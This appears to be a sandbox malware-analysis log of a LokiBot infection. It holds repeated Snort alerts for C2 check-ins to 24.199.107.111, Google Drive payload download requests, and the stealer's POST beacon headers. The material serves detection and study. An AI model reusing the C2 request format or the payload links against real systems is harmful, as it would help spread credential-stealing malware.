              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49739 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49742 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49742 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49742 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49742 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49743 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49743 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49743 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49743 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49744 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49744 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49744 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49744 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49745 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49745 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49745 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49745 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49746 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49746 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49746 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49746 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49747 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49747 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49747 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49747 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49748 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49748 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49751 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49751 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49751 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49751 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49752 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49752 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49752 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49752 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49753 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49753 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49753 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49753 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49754 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49754 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49754 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49754 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49755 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49755 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49756 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49756 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49756 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49756 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49757 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49757 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49757 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49757 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49758 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49758 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49758 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49758 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49759 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49759 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49759 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49759 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49760 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49760 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49760 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49760 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49761 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49761 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49761 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49761 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49762 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49762 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49762 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49762 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49763 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49763 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49763 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49763 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49764 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49764 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49764 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49764 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49765 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49765 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49765 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49765 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49766 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49766 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49766 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49766 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49767 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49767 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49767 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49767 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49768 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49768 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49768 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49768 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49769 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49769 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49769 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49769 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49770 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49770 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49770 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49770 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49771 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49771 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49771 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49771 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49772 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49772 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49772 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49772 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49773 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49773 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49773 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49773 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49774 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49774 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49774 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49774 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49775 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49775 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49775 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49775 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49776 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49776 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49776 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49776 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49777 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49777 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49777 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49777 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49778 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49778 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49778 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49778 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49779 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49779 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49779 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49779 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49780 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49780 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49780 -> 24.199.107.111:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49780 -> 24.199.107.111:80
              Source: Joe Sandbox ViewIP Address: 24.199.107.111 24.199.107.111
              Source: Joe Sandbox ViewASN Name: TWC-12271-NYCUS TWC-12271-NYCUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1NuRs33pJXEZqHl9cIafOpya6u7I1vPKV HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1NuRs33pJXEZqHl9cIafOpya6u7I1vPKV&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1w6J0xEPtolIyRbLIjhnxbM_QNNOpTZFW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1w6J0xEPtolIyRbLIjhnxbM_QNNOpTZFW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 180Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 180Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 153Connection: close
